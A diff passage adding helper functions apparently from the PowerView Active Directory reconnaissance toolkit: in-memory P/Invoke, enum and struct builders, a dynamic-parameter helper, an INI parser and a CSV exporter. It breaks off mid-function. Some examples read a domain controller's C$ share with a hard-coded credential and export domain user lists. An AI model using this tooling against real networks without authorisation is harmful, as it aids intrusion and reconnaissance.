+ [Parameter(ValueFromPipelineByPropertyName=$True)] + [Switch] + $SetLastError, + + [Parameter(Mandatory=$True)] + [ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})] + $Module, + + [ValidateNotNull()] + [String] + $Namespace = '' + ) + + BEGIN + { + $TypeHash = @{} + } + + PROCESS + { + if ($Module -is [Reflection.Assembly]) + { + if ($Namespace) + { + $TypeHash[$DllName] = $Module.GetType("$Namespace.$DllName") + } + else + { + $TypeHash[$DllName] = $Module.GetType($DllName) + } + } + else + { + # Define one type for each DLL + if (!$TypeHash.ContainsKey($DllName)) + { + if ($Namespace) + { + $TypeHash[$DllName] = $Module.DefineType("$Namespace.$DllName", 'Public,BeforeFieldInit') + } + else + { + $TypeHash[$DllName] = $Module.DefineType($DllName, 'Public,BeforeFieldInit') + } + } + + $Method = $TypeHash[$DllName].DefineMethod( + $FunctionName, + 'Public,Static,PinvokeImpl', + $ReturnType, + $ParameterTypes) + + # Make each ByRef parameter an Out parameter + $i = 1 + foreach($Parameter in $ParameterTypes) + { + if ($Parameter.IsByRef) + { + [void] $Method.DefineParameter($i, 'Out', $null) + } + + $i++ + } + + $DllImport = [Runtime.InteropServices.DllImportAttribute] + $SetLastErrorField = $DllImport.GetField('SetLastError') + $CallingConventionField = $DllImport.GetField('CallingConvention') + $CharsetField = $DllImport.GetField('CharSet') + $EntryPointField = $DllImport.GetField('EntryPoint') + if ($SetLastError) { $SLEValue = $True } else { $SLEValue = $False } + + if ($PSBoundParameters['EntryPoint']) { $ExportedFuncName = $EntryPoint } else { $ExportedFuncName = $FunctionName } + + # Equivalent to C# version of [DllImport(DllName)] + $Constructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor([String]) + $DllImportAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($Constructor, + $DllName, [Reflection.PropertyInfo[]] @(), [Object[]] @(), + [Reflection.FieldInfo[]] @($SetLastErrorField, + $CallingConventionField, + $CharsetField, + $EntryPointField), + [Object[]] @($SLEValue, + ([Runtime.InteropServices.CallingConvention] $NativeCallingConvention), + ([Runtime.InteropServices.CharSet] $Charset), + $ExportedFuncName)) + + $Method.SetCustomAttribute($DllImportAttribute) + } + } + + END + { + if ($Module -is [Reflection.Assembly]) + { + return $TypeHash + } + + $ReturnTypes = @{} + + foreach ($Key in $TypeHash.Keys) + { + $Type = $TypeHash[$Key].CreateType() + + $ReturnTypes[$Key] = $Type + } + + return $ReturnTypes + } +} + + +function psenum { +<# +.SYNOPSIS + +Creates an in-memory enumeration for use in your PowerShell session. + +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +.DESCRIPTION + +The 'psenum' function facilitates the creation of enums entirely in +memory using as close to a "C style" as PowerShell will allow. + +.PARAMETER Module + +The in-memory module that will host the enum. Use +New-InMemoryModule to define an in-memory module. + +.PARAMETER FullName + +The fully-qualified name of the enum. + +.PARAMETER Type + +The type of each enum element. + +.PARAMETER EnumElements + +A hashtable of enum elements. + +.PARAMETER Bitfield + +Specifies that the enum should be treated as a bitfield. + +.EXAMPLE + +$Mod = New-InMemoryModule -ModuleName Win32 + +$ImageSubsystem = psenum $Mod PE.IMAGE_SUBSYSTEM UInt16 @{ + UNKNOWN = 0 + NATIVE = 1 # Image doesn't require a subsystem. + WINDOWS_GUI = 2 # Image runs in the Windows GUI subsystem. + WINDOWS_CUI = 3 # Image runs in the Windows character subsystem. + OS2_CUI = 5 # Image runs in the OS/2 character subsystem. + POSIX_CUI = 7 # Image runs in the Posix character subsystem. + NATIVE_WINDOWS = 8 # Image is a native Win9x driver. + WINDOWS_CE_GUI = 9 # Image runs in the Windows CE subsystem. + EFI_APPLICATION = 10 + EFI_BOOT_SERVICE_DRIVER = 11 + EFI_RUNTIME_DRIVER = 12 + EFI_ROM = 13 + XBOX = 14 + WINDOWS_BOOT_APPLICATION = 16 +} + +.NOTES + +PowerShell purists may disagree with the naming of this function but +again, this was developed in such a way so as to emulate a "C style" +definition as closely as possible. Sorry, I'm not going to name it +New-Enum. :P +#> + + [OutputType([Type])] + Param ( + [Parameter(Position = 0, Mandatory=$True)] + [ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})] + $Module, + + [Parameter(Position = 1, Mandatory=$True)] + [ValidateNotNullOrEmpty()] + [String] + $FullName, + + [Parameter(Position = 2, Mandatory=$True)] + [Type] + $Type, + + [Parameter(Position = 3, Mandatory=$True)] + [ValidateNotNullOrEmpty()] + [Hashtable] + $EnumElements, + + [Switch] + $Bitfield + ) + + if ($Module -is [Reflection.Assembly]) + { + return ($Module.GetType($FullName)) + } + + $EnumType = $Type -as [Type] + + $EnumBuilder = $Module.DefineEnum($FullName, 'Public', $EnumType) + + if ($Bitfield) + { + $FlagsConstructor = [FlagsAttribute].GetConstructor(@()) + $FlagsCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($FlagsConstructor, @()) + $EnumBuilder.SetCustomAttribute($FlagsCustomAttribute) + } + + foreach ($Key in $EnumElements.Keys) + { + # Apply the specified enum type to each element + $null = $EnumBuilder.DefineLiteral($Key, $EnumElements[$Key] -as $EnumType) + } + + $EnumBuilder.CreateType() +} + + +# A helper function used to reduce typing while defining struct +# fields. +function field { + Param ( + [Parameter(Position = 0, Mandatory=$True)] + [UInt16] + $Position, + + [Parameter(Position = 1, Mandatory=$True)] + [Type] + $Type, + + [Parameter(Position = 2)] + [UInt16] + $Offset, + + [Object[]] + $MarshalAs + ) + + @{ + Position = $Position + Type = $Type -as [Type] + Offset = $Offset + MarshalAs = $MarshalAs + } +} + + +function struct +{ +<# +.SYNOPSIS + +Creates an in-memory struct for use in your PowerShell session. + +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: field + +.DESCRIPTION + +The 'struct' function facilitates the creation of structs entirely in +memory using as close to a "C style" as PowerShell will allow. Struct +fields are specified using a hashtable where each field of the struct +is comprosed of the order in which it should be defined, its .NET +type, and optionally, its offset and special marshaling attributes. + +One of the features of 'struct' is that after your struct is defined, +it will come with a built-in GetSize method as well as an explicit +converter so that you can easily cast an IntPtr to the struct without +relying upon calling SizeOf and/or PtrToStructure in the Marshal +class. + +.PARAMETER Module + +The in-memory module that will host the struct. Use +New-InMemoryModule to define an in-memory module. + +.PARAMETER FullName + +The fully-qualified name of the struct. + +.PARAMETER StructFields + +A hashtable of fields. Use the 'field' helper function to ease +defining each field. + +.PARAMETER PackingSize + +Specifies the memory alignment of fields. + +.PARAMETER ExplicitLayout + +Indicates that an explicit offset for each field will be specified. + +.EXAMPLE + +$Mod = New-InMemoryModule -ModuleName Win32 + +$ImageDosSignature = psenum $Mod PE.IMAGE_DOS_SIGNATURE UInt16 @{ + DOS_SIGNATURE = 0x5A4D + OS2_SIGNATURE = 0x454E + OS2_SIGNATURE_LE = 0x454C + VXD_SIGNATURE = 0x454C +} + +$ImageDosHeader = struct $Mod PE.IMAGE_DOS_HEADER @{ + e_magic = field 0 $ImageDosSignature + e_cblp = field 1 UInt16 + e_cp = field 2 UInt16 + e_crlc = field 3 UInt16 + e_cparhdr = field 4 UInt16 + e_minalloc = field 5 UInt16 + e_maxalloc = field 6 UInt16 + e_ss = field 7 UInt16 + e_sp = field 8 UInt16 + e_csum = field 9 UInt16 + e_ip = field 10 UInt16 + e_cs = field 11 UInt16 + e_lfarlc = field 12 UInt16 + e_ovno = field 13 UInt16 + e_res = field 14 UInt16[] -MarshalAs @('ByValArray', 4) + e_oemid = field 15 UInt16 + e_oeminfo = field 16 UInt16 + e_res2 = field 17 UInt16[] -MarshalAs @('ByValArray', 10) + e_lfanew = field 18 Int32 +} + +# Example of using an explicit layout in order to create a union. +$TestUnion = struct $Mod TestUnion @{ + field1 = field 0 UInt32 0 + field2 = field 1 IntPtr 0 +} -ExplicitLayout + +.NOTES + +PowerShell purists may disagree with the naming of this function but +again, this was developed in such a way so as to emulate a "C style" +definition as closely as possible. Sorry, I'm not going to name it +New-Struct. :P +#> + + [OutputType([Type])] + Param ( + [Parameter(Position = 1, Mandatory=$True)] + [ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})] + $Module, + + [Parameter(Position = 2, Mandatory=$True)] + [ValidateNotNullOrEmpty()] + [String] + $FullName, + + [Parameter(Position = 3, Mandatory=$True)] + [ValidateNotNullOrEmpty()] + [Hashtable] + $StructFields, + + [Reflection.Emit.PackingSize] + $PackingSize = [Reflection.Emit.PackingSize]::Unspecified, + + [Switch] + $ExplicitLayout + ) + + if ($Module -is [Reflection.Assembly]) + { + return ($Module.GetType($FullName)) + } + + [Reflection.TypeAttributes] $StructAttributes = 'AnsiClass, + Class, + Public, + Sealed, + BeforeFieldInit' + + if ($ExplicitLayout) + { + $StructAttributes = $StructAttributes -bor [Reflection.TypeAttributes]::ExplicitLayout + } + else + { + $StructAttributes = $StructAttributes -bor [Reflection.TypeAttributes]::SequentialLayout + } + + $StructBuilder = $Module.DefineType($FullName, $StructAttributes, [ValueType], $PackingSize) + $ConstructorInfo = [Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0] + $SizeConst = @([Runtime.InteropServices.MarshalAsAttribute].GetField('SizeConst')) + + $Fields = New-Object Hashtable[]($StructFields.Count) + + # Sort each field according to the orders specified + # Unfortunately, PSv2 doesn't have the luxury of the + # hashtable [Ordered] accelerator. + foreach ($Field in $StructFields.Keys) + { + $Index = $StructFields[$Field]['Position'] + $Fields[$Index] = @{FieldName = $Field; Properties = $StructFields[$Field]} + } + + foreach ($Field in $Fields) + { + $FieldName = $Field['FieldName'] + $FieldProp = $Field['Properties'] + + $Offset = $FieldProp['Offset'] + $Type = $FieldProp['Type'] + $MarshalAs = $FieldProp['MarshalAs'] + + $NewField = $StructBuilder.DefineField($FieldName, $Type, 'Public') + + if ($MarshalAs) + { + $UnmanagedType = $MarshalAs[0] -as ([Runtime.InteropServices.UnmanagedType]) + if ($MarshalAs[1]) + { + $Size = $MarshalAs[1] + $AttribBuilder = New-Object Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, + $UnmanagedType, $SizeConst, @($Size)) + } + else + { + $AttribBuilder = New-Object Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, [Object[]] @($UnmanagedType)) + } + + $NewField.SetCustomAttribute($AttribBuilder) + } + + if ($ExplicitLayout) { $NewField.SetOffset($Offset) } + } + + # Make the struct aware of its own size. + # No more having to call [Runtime.InteropServices.Marshal]::SizeOf! + $SizeMethod = $StructBuilder.DefineMethod('GetSize', + 'Public, Static', + [Int], + [Type[]] @()) + $ILGenerator = $SizeMethod.GetILGenerator() + # Thanks for the help, Jason Shirk! + $ILGenerator.Emit([Reflection.Emit.OpCodes]::Ldtoken, $StructBuilder) + $ILGenerator.Emit([Reflection.Emit.OpCodes]::Call, + [Type].GetMethod('GetTypeFromHandle')) + $ILGenerator.Emit([Reflection.Emit.OpCodes]::Call, + [Runtime.InteropServices.Marshal].GetMethod('SizeOf', [Type[]] @([Type]))) + $ILGenerator.Emit([Reflection.Emit.OpCodes]::Ret) + + # Allow for explicit casting from an IntPtr + # No more having to call [Runtime.InteropServices.Marshal]::PtrToStructure! + $ImplicitConverter = $StructBuilder.DefineMethod('op_Implicit', + 'PrivateScope, Public, Static, HideBySig, SpecialName', + $StructBuilder, + [Type[]] @([IntPtr])) + $ILGenerator2 = $ImplicitConverter.GetILGenerator() + $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Nop) + $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Ldarg_0) + $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Ldtoken, $StructBuilder) + $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Call, + [Type].GetMethod('GetTypeFromHandle')) + $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Call, + [Runtime.InteropServices.Marshal].GetMethod('PtrToStructure', [Type[]] @([IntPtr], [Type]))) + $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Unbox_Any, $StructBuilder) + $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Ret) + + $StructBuilder.CreateType() +} + + +######################################################## +# +# Misc. helpers +# +######################################################## + +Function New-DynamicParameter { +<# +.SYNOPSIS + +Helper function to simplify creating dynamic parameters. + + Adapated from https://beatcracker.wordpress.com/2015/08/10/dynamic-parameters-validateset-and-enums/. + Originally released under the Microsoft Public License (Ms-PL). + +.DESCRIPTION + +Helper function to simplify creating dynamic parameters. + +Example use cases: + Include parameters only if your environment dictates it + Include parameters depending on the value of a user-specified parameter + Provide tab completion and intellisense for parameters, depending on the environment + +Please keep in mind that all dynamic parameters you create, will not have corresponding variables created. + Use New-DynamicParameter with 'CreateVariables' switch in your main code block, + ('Process' for advanced functions) to create those variables. + Alternatively, manually reference $PSBoundParameters for the dynamic parameter value. + +This function has two operating modes: + +1. All dynamic parameters created in one pass using pipeline input to the function. This mode allows to create dynamic parameters en masse, +with one function call. There is no need to create and maintain custom RuntimeDefinedParameterDictionary. + +2. Dynamic parameters are created by separate function calls and added to the RuntimeDefinedParameterDictionary you created beforehand. +Then you output this RuntimeDefinedParameterDictionary to the pipeline. This allows more fine-grained control of the dynamic parameters, +with custom conditions and so on. + +.NOTES + +Credits to jrich523 and ramblingcookiemonster for their initial code and inspiration: + https://github.com/RamblingCookieMonster/PowerShell/blob/master/New-DynamicParam.ps1 + http://ramblingcookiemonster.wordpress.com/2014/11/27/quick-hits-credentials-and-dynamic-parameters/ + http://jrich523.wordpress.com/2013/05/30/powershell-simple-way-to-add-dynamic-parameters-to-advanced-function/ + +Credit to BM for alias and type parameters and their handling + +.PARAMETER Name + +Name of the dynamic parameter + +.PARAMETER Type + +Type for the dynamic parameter. Default is string + +.PARAMETER Alias + +If specified, one or more aliases to assign to the dynamic parameter + +.PARAMETER Mandatory + +If specified, set the Mandatory attribute for this dynamic parameter + +.PARAMETER Position + +If specified, set the Position attribute for this dynamic parameter + +.PARAMETER HelpMessage + +If specified, set the HelpMessage for this dynamic parameter + +.PARAMETER DontShow + +If specified, set the DontShow for this dynamic parameter. +This is the new PowerShell 4.0 attribute that hides parameter from tab-completion. +http://www.powershellmagazine.com/2013/07/29/pstip-hiding-parameters-from-tab-completion/ + +.PARAMETER ValueFromPipeline + +If specified, set the ValueFromPipeline attribute for this dynamic parameter + +.PARAMETER ValueFromPipelineByPropertyName + +If specified, set the ValueFromPipelineByPropertyName attribute for this dynamic parameter + +.PARAMETER ValueFromRemainingArguments + +If specified, set the ValueFromRemainingArguments attribute for this dynamic parameter + +.PARAMETER ParameterSetName + +If specified, set the ParameterSet attribute for this dynamic parameter. By default parameter is added to all parameters sets. + +.PARAMETER AllowNull + +If specified, set the AllowNull attribute of this dynamic parameter + +.PARAMETER AllowEmptyString + +If specified, set the AllowEmptyString attribute of this dynamic parameter + +.PARAMETER AllowEmptyCollection + +If specified, set the AllowEmptyCollection attribute of this dynamic parameter + +.PARAMETER ValidateNotNull + +If specified, set the ValidateNotNull attribute of this dynamic parameter + +.PARAMETER ValidateNotNullOrEmpty + +If specified, set the ValidateNotNullOrEmpty attribute of this dynamic parameter + +.PARAMETER ValidateRange + +If specified, set the ValidateRange attribute of this dynamic parameter + +.PARAMETER ValidateLength + +If specified, set the ValidateLength attribute of this dynamic parameter + +.PARAMETER ValidatePattern + +If specified, set the ValidatePattern attribute of this dynamic parameter + +.PARAMETER ValidateScript + +If specified, set the ValidateScript attribute of this dynamic parameter + +.PARAMETER ValidateSet + +If specified, set the ValidateSet attribute of this dynamic parameter + +.PARAMETER Dictionary + +If specified, add resulting RuntimeDefinedParameter to an existing RuntimeDefinedParameterDictionary. +Appropriate for custom dynamic parameters creation. + +If not specified, create and return a RuntimeDefinedParameterDictionary +Appropriate for a simple dynamic parameter creation. +#> + + [CmdletBinding(DefaultParameterSetName = 'DynamicParameter')] + Param ( + [Parameter(Mandatory = $true, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [ValidateNotNullOrEmpty()] + [string]$Name, + + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [System.Type]$Type = [int], + + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [string[]]$Alias, + + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [switch]$Mandatory, + + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [int]$Position, + + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [string]$HelpMessage, + + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [switch]$DontShow, + + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [switch]$ValueFromPipeline, + + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [switch]$ValueFromPipelineByPropertyName, + + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [switch]$ValueFromRemainingArguments, + + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [string]$ParameterSetName = '__AllParameterSets', + + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [switch]$AllowNull, + + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [switch]$AllowEmptyString, + + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [switch]$AllowEmptyCollection, + + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [switch]$ValidateNotNull, + + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [switch]$ValidateNotNullOrEmpty, + + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [ValidateCount(2,2)] + [int[]]$ValidateCount, + + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [ValidateCount(2,2)] + [int[]]$ValidateRange, + + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [ValidateCount(2,2)] + [int[]]$ValidateLength, + + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [ValidateNotNullOrEmpty()] + [string]$ValidatePattern, + + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [ValidateNotNullOrEmpty()] + [scriptblock]$ValidateScript, + + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [ValidateNotNullOrEmpty()] + [string[]]$ValidateSet, + + [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')] + [ValidateNotNullOrEmpty()] + [ValidateScript({ + if(!($_ -is [System.Management.Automation.RuntimeDefinedParameterDictionary])) + { + Throw 'Dictionary must be a System.Management.Automation.RuntimeDefinedParameterDictionary object' + } + $true + })] + $Dictionary = $false, + + [Parameter(Mandatory = $true, ValueFromPipelineByPropertyName = $true, ParameterSetName = 'CreateVariables')] + [switch]$CreateVariables, + + [Parameter(Mandatory = $true, ValueFromPipelineByPropertyName = $true, ParameterSetName = 'CreateVariables')] + [ValidateNotNullOrEmpty()] + [ValidateScript({ + # System.Management.Automation.PSBoundParametersDictionary is an internal sealed class, + # so one can't use PowerShell's '-is' operator to validate type. + if($_.GetType().Name -notmatch 'Dictionary') { + Throw 'BoundParameters must be a System.Management.Automation.PSBoundParametersDictionary object' + } + $true + })] + $BoundParameters + ) + + Begin { + $InternalDictionary = New-Object -TypeName System.Management.Automation.RuntimeDefinedParameterDictionary + function _temp { [CmdletBinding()] Param() } + $CommonParameters = (Get-Command _temp).Parameters.Keys + } + + Process { + if($CreateVariables) { + $BoundKeys = $BoundParameters.Keys | Where-Object { $CommonParameters -notcontains $_ } + ForEach($Parameter in $BoundKeys) { + if ($Parameter) { + Set-Variable -Name $Parameter -Value $BoundParameters.$Parameter -Scope 1 -Force + } + } + } + else { + $StaleKeys = @() + $StaleKeys = $PSBoundParameters.GetEnumerator() | + ForEach-Object { + if($_.Value.PSobject.Methods.Name -match '^Equals$') { + # If object has Equals, compare bound key and variable using it + if(!$_.Value.Equals((Get-Variable -Name $_.Key -ValueOnly -Scope 0))) { + $_.Key + } + } + else { + # If object doesn't has Equals (e.g. $null), fallback to the PowerShell's -ne operator + if($_.Value -ne (Get-Variable -Name $_.Key -ValueOnly -Scope 0)) { + $_.Key + } + } + } + if($StaleKeys) { + $StaleKeys | ForEach-Object {[void]$PSBoundParameters.Remove($_)} + } + + # Since we rely solely on $PSBoundParameters, we don't have access to default values for unbound parameters + $UnboundParameters = (Get-Command -Name ($PSCmdlet.MyInvocation.InvocationName)).Parameters.GetEnumerator() | + # Find parameters that are belong to the current parameter set + Where-Object { $_.Value.ParameterSets.Keys -contains $PsCmdlet.ParameterSetName } | + Select-Object -ExpandProperty Key | + # Find unbound parameters in the current parameter set + Where-Object { $PSBoundParameters.Keys -notcontains $_ } + + # Even if parameter is not bound, corresponding variable is created with parameter's default value (if specified) + $tmp = $null + ForEach ($Parameter in $UnboundParameters) { + $DefaultValue = Get-Variable -Name $Parameter -ValueOnly -Scope 0 + if(!$PSBoundParameters.TryGetValue($Parameter, [ref]$tmp) -and $DefaultValue) { + $PSBoundParameters.$Parameter = $DefaultValue + } + } + + if($Dictionary) { + $DPDictionary = $Dictionary + } + else { + $DPDictionary = $InternalDictionary + } + + # Shortcut for getting local variables + $GetVar = {Get-Variable -Name $_ -ValueOnly -Scope 0} + + # Strings to match attributes and validation arguments + $AttributeRegex = '^(Mandatory|Position|ParameterSetName|DontShow|HelpMessage|ValueFromPipeline|ValueFromPipelineByPropertyName|ValueFromRemainingArguments)$' + $ValidationRegex = '^(AllowNull|AllowEmptyString|AllowEmptyCollection|ValidateCount|ValidateLength|ValidatePattern|ValidateRange|ValidateScript|ValidateSet|ValidateNotNull|ValidateNotNullOrEmpty)$' + $AliasRegex = '^Alias$' + $ParameterAttribute = New-Object -TypeName System.Management.Automation.ParameterAttribute + + switch -regex ($PSBoundParameters.Keys) { + $AttributeRegex { + Try { + $ParameterAttribute.$_ = . $GetVar + } + Catch { + $_ + } + continue + } + } + + if($DPDictionary.Keys -contains $Name) { + $DPDictionary.$Name.Attributes.Add($ParameterAttribute) + } + else { + $AttributeCollection = New-Object -TypeName Collections.ObjectModel.Collection[System.Attribute] + switch -regex ($PSBoundParameters.Keys) { + $ValidationRegex { + Try { + $ParameterOptions = New-Object -TypeName "System.Management.Automation.${_}Attribute" -ArgumentList (. $GetVar) -ErrorAction Stop + $AttributeCollection.Add($ParameterOptions) + } + Catch { $_ } + continue + } + $AliasRegex { + Try { + $ParameterAlias = New-Object -TypeName System.Management.Automation.AliasAttribute -ArgumentList (. $GetVar) -ErrorAction Stop + $AttributeCollection.Add($ParameterAlias) + continue + } + Catch { $_ } + } + } + $AttributeCollection.Add($ParameterAttribute) + $Parameter = New-Object -TypeName System.Management.Automation.RuntimeDefinedParameter -ArgumentList @($Name, $Type, $AttributeCollection) + $DPDictionary.Add($Name, $Parameter) + } + } + } + + End { + if(!$CreateVariables -and !$Dictionary) { + $DPDictionary + } + } +} + + +function Get-IniContent { +<# +.SYNOPSIS + +This helper parses an .ini file into a hashtable. + +Author: 'The Scripting Guys' +Modifications: @harmj0y (-Credential support) +License: BSD 3-Clause +Required Dependencies: Add-RemoteConnection, Remove-RemoteConnection + +.DESCRIPTION + +Parses an .ini file into a hashtable. If -Credential is supplied, +then Add-RemoteConnection is used to map \\COMPUTERNAME\IPC$, the file +is parsed, and then the connection is destroyed with Remove-RemoteConnection. + +.PARAMETER Path + +Specifies the path to the .ini file to parse. + +.PARAMETER OutputObject + +Switch. Output a custom PSObject instead of a hashtable. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the remote system. + +.EXAMPLE + +Get-IniContent C:\Windows\example.ini + +.EXAMPLE + +"C:\Windows\example.ini" | Get-IniContent -OutputObject + +Outputs the .ini details as a proper nested PSObject. + +.EXAMPLE + +"C:\Windows\example.ini" | Get-IniContent + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-IniContent -Path \\PRIMARY.testlab.local\C$\Temp\GptTmpl.inf -Credential $Cred + +.INPUTS + +String + +Accepts one or more .ini paths on the pipeline. + +.OUTPUTS + +Hashtable + +Ouputs a hashtable representing the parsed .ini file. + +.LINK + +https://blogs.technet.microsoft.com/heyscriptingguy/2011/08/20/use-powershell-to-work-with-any-ini-file/ +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType([Hashtable])] + [CmdletBinding()] + Param( + [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('FullName', 'Name')] + [ValidateNotNullOrEmpty()] + [String[]] + $Path, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [Switch] + $OutputObject + ) + + BEGIN { + $MappedComputers = @{} + } + + PROCESS { + ForEach ($TargetPath in $Path) { + if (($TargetPath -Match '\\\\.*\\.*') -and ($PSBoundParameters['Credential'])) { + $HostComputer = (New-Object System.Uri($TargetPath)).Host + if (-not $MappedComputers[$HostComputer]) { + # map IPC$ to this computer if it's not already + Add-RemoteConnection -ComputerName $HostComputer -Credential $Credential + $MappedComputers[$HostComputer] = $True + } + } + + if (Test-Path -Path $TargetPath) { + if ($PSBoundParameters['OutputObject']) { + $IniObject = New-Object PSObject + } + else { + $IniObject = @{} + } + Switch -Regex -File $TargetPath { + "^\[(.+)\]" # Section + { + $Section = $matches[1].Trim() + if ($PSBoundParameters['OutputObject']) { + $Section = $Section.Replace(' ', '') + $SectionObject = New-Object PSObject + $IniObject | Add-Member Noteproperty $Section $SectionObject + } + else { + $IniObject[$Section] = @{} + } + $CommentCount = 0 + } + "^(;.*)$" # Comment + { + $Value = $matches[1].Trim() + $CommentCount = $CommentCount + 1 + $Name = 'Comment' + $CommentCount + if ($PSBoundParameters['OutputObject']) { + $Name = $Name.Replace(' ', '') + $IniObject.$Section | Add-Member Noteproperty $Name $Value + } + else { + $IniObject[$Section][$Name] = $Value + } + } + "(.+?)\s*=(.*)" # Key + { + $Name, $Value = $matches[1..2] + $Name = $Name.Trim() + $Values = $Value.split(',') | ForEach-Object { $_.Trim() } + + # if ($Values -isnot [System.Array]) { $Values = @($Values) } + + if ($PSBoundParameters['OutputObject']) { + $Name = $Name.Replace(' ', '') + $IniObject.$Section | Add-Member Noteproperty $Name $Values + } + else { + $IniObject[$Section][$Name] = $Values + } + } + } + $IniObject + } + } + } + + END { + # remove the IPC$ mappings + $MappedComputers.Keys | Remove-RemoteConnection + } +} + + +function Export-PowerViewCSV { +<# +.SYNOPSIS + +Converts objects into a series of comma-separated (CSV) strings and saves the +strings in a CSV file in a thread-safe manner. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +.DESCRIPTION + +This helper exports an -InputObject to a .csv in a thread-safe manner +using a mutex. This is so the various multi-threaded functions in +PowerView has a thread-safe way to export output to the same file. +Uses .NET IO.FileStream/IO.StreamWriter objects for speed. + +Originally based on Dmitry Sotnikov's Export-CSV code: http://poshcode.org/1590 + +.PARAMETER InputObject + +Specifies the objects to export as CSV strings. + +.PARAMETER Path + +Specifies the path to the CSV output file. + +.PARAMETER Delimiter + +Specifies a delimiter to separate the property values. The default is a comma (,) + +.PARAMETER Append + +Indicates that this cmdlet adds the CSV output to the end of the specified file. +Without this parameter, Export-PowerViewCSV replaces the file contents without warning. + +.EXAMPLE + +Get-DomainUser | Export-PowerViewCSV -Path "users.csv" + +.EXAMPLE + +Get-DomainUser | Export-PowerViewCSV -Path "users.csv" -Append -Delimiter '|' + +.INPUTS + +PSObject + +Accepts one or more PSObjects on the pipeline. + +.LINK + +http://poshcode.org/1590 +http://dmitrysotnikov.wordpress.com/2010/01/19/Export-Csv-append/ +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [CmdletBinding()] + Param( + [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [System.Management.Automation.PSObject[]] + $InputObject, + + [Parameter(Mandatory = $True, Position = 1)] + [ValidateNotNullOrEmpty()] + [String] + $Path, + + [Parameter(Position = 2)] + [ValidateNotNullOrEmpty()] + [Char] + $Delimiter = ',', + + [Switch] + $Append + ) + + BEGIN { + $OutputPath = [IO.Path]::GetFullPath($PSBoundParameters['Path']) + $Exists = [System.IO.File]::Exists($OutputPath) + + # mutex so threaded code doesn't stomp on the output file + $Mutex = New-Object System.Threading.Mutex $False,'CSVMutex' + $Null = $Mutex.WaitOne() + + if ($PSBoundParameters['Append']) { + $FileMode = [System.IO.FileMode]::Append + } + else { + $FileMode = [System.IO.FileMode]::Create + $Exists = $False + } + + $CSVStream = New-Object IO.FileStream($OutputPath, $FileMode, [System.IO.FileAccess]::Write, [IO.FileShare]::Read) + $CSVWriter = New-Object System.IO.StreamWriter($CSVStream) + $CSVWriter.AutoFlush = $True + } + + PROCESS { + ForEach ($Entry in $InputObject) { + $ObjectCSV = ConvertTo-Csv -InputObject $Entry -Delimiter $Delimiter -NoTypeInformation + + if (-not $Exists) { + # output the object field names as well + 